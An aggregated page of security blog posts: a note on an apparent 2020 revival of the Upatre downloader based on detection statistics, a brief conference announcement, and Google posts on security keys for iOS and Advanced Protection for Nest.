First discovered in 2013, Upatre is primarily a downloader tool responsible for delivering additional trojans onto the victim host. It is most well-known for being tied with the Dyre banking trojan, with a peak of over 250,000 Upatre infections per month delivering Dyre back in July 2015. In November 2015 however, an organization thought to be associated with the Dyre operation was raided, and subsequently the usage of Upatre delivering Dyre dropped dramatically, to less than 600 per month by January 2016.

From PaloAlto Unit42

From 2016 until today I’ve never experienced a new Upatre campaign, or something like that, but something looks to be changed. Analyzing the Cyber Threats Trends findings (for an upcoming post) I spotted an interesting revival of the Upatre downloader starting from April 2020. The following image shows what I mean. Zero Upatre findings until April 21 2020 and almost 50 single detections per day since that date. Those statistics are so strange to me, that I need to doubt about that. So let’s take a closer look to it and see if there is some misclassification around.

Upatre Time Distribution

Digging a little bit on that samples by asking a second opinion to VirusTotal it looks like matches are genuine. In order to verify that “revival”, I firstly have taken some random samples (with Upatre classification tag) and then verified on VirusTotal the malware classification and the first submission date. Following an example of the performed checks. As you might see from the following picture, 9 AV classified that sample as Upatre, so we might consider not a “false positive” or a “miss-classificated” sample.

Upatre Correct Classification

The following image shows the “First Submission Date” which is aligned to what I’ve seen on Cyber Threats Trends. If you take some more samples from the following list (IoC Section) you will probably see much more cases similar to that one. I did many checks and I wasn’t able to find mismatches at all, so I decided to write up this post about it.

Upatre First Submission

Conclusion

It’s something very interesting, at least to my understanding, to see an ancient downloader be resumed in such a specific period. Many people starting from April up to today are stuck at home performing what has been called “quarantine” due to COVID pandemic. Curiously during the same time, while people are working from home and potentially have much more free time (since they can’t get out home), this older downloader reappears. Maybe somebody took advantage from this bad situation to resurrect some old tools stored in dusty external hard-drive ?

IoC (3384)

For the complete IoC list check it out: HERE

iKeepSafe has announced a change to a virtual format for 2020 NICE K12 Cybersecurity Education Conference

6th Annual NICE K12 Cybersecurity Education Conference Call for Presentations: Open April 1 – June 30, 2020 In an effort to be mindful of health concerns, travel restrictions, budget impacts, and based on the conference's continued commitment to equity and inclusion, the National Initiative for Cybersecurity Education (NICE) K12 Cybersecurity Education Conference will be reimagined to bring the community spirit and networking energy to an inspiring and engaging online space. The Conference, previously slated to take place on December 7-8, 2020 in St. Louis, Missouri, will now be a virtual

Making the Advanced Protection Program and Titan Security Keys easier to use on Apple iOS devices




Starting today, we’re rolling out a change that enables native support for the W3C WebAuthn implementation for Google Accounts on Apple devices running iOS 13.3 and above. This capability, available for both personal and work Google Accounts, simplifies your security key experience on compatible iOS devices and allows you to use more types of security keys for your Google Account and the Advanced Protection Program.


Using an NFC security key on iPhone

More security key choices for users
  • Both the USB-A and Bluetooth Titan Security Keys have NFC functionality built-in. This allows you to tap your key to the back of your iPhone when prompted at sign-in.
  • You can use a Lightning security key like the YubiKey 5Ci or any USB security key if you have an Apple Lightning to USB Camera Adapter.
  • You can plug a USB-C security key in directly to an iOS device that has a USB-C port (such as an iPad Pro).
  • We suggest installing the Smart Lock app in order to use Bluetooth security keys and your phone’s built-in security key, which allows you to use your iPhone as an additional security key for your Google Account.
In order to add your Google Account to your iOS device, navigate to “Settings > Passwords & Accounts” on your iOS device or install the Google app and sign in.


Account security best practices


We highly recommend users at a higher risk of targeted attacks to get security keys (such as Titan Security Key or your Android or iOS phone) and enroll into the Advanced Protection Program. If you’re working for political committees in the United States, you may be eligible to request free Titan Security Keys through the Defending Digital Campaigns to get help enrolling into Advanced Protection.

You can also use security keys for any site where FIDO security keys are supported for 2FA, including your personal or work Google Account, 1Password, Bitbucket, Bitfinex, Coinbase, Dropbox, Facebook, GitHub, Salesforce, Stripe, Twitter, and more.

The Advanced Protection Program comes to Google Nest



The Advanced Protection Program is our strongest level of Google Account security for people at high risk of targeted online attacks, such as journalists, activists, business leaders, and people working on elections. Anyone can sign up to automatically receive extra safeguards against phishing, malware, and fraudulent access to their data.

Since we launched, one of our goals has been to bring Advanced Protection’s features to other Google products. Over the years, we’ve incorporated many of them into GSuite, Google Cloud Platform, Chrome, and most recently, Android. We want as many users as possible to benefit from the additional levels of security that the Program provides.

Today we’re announcing one of the top requests we’ve received: to bring the Advanced Protection Program to Nest.  Now people can seamlessly use their Google Accounts with both Advanced Protection and Google Nest devices -- previously, a user could use their Google Account on only one of these at a time.

Feeling safe at home has never been more important and Nest has announced a variety of new security features this year, including using reCAPTCHA Enterprise, to significantly lower the likelihood of automated attacks. Today’s improvement adds yet another layer of protection for people with Nest devices.

For more information about using Advanced Protection with Google Nest devices, check out this article in our help center.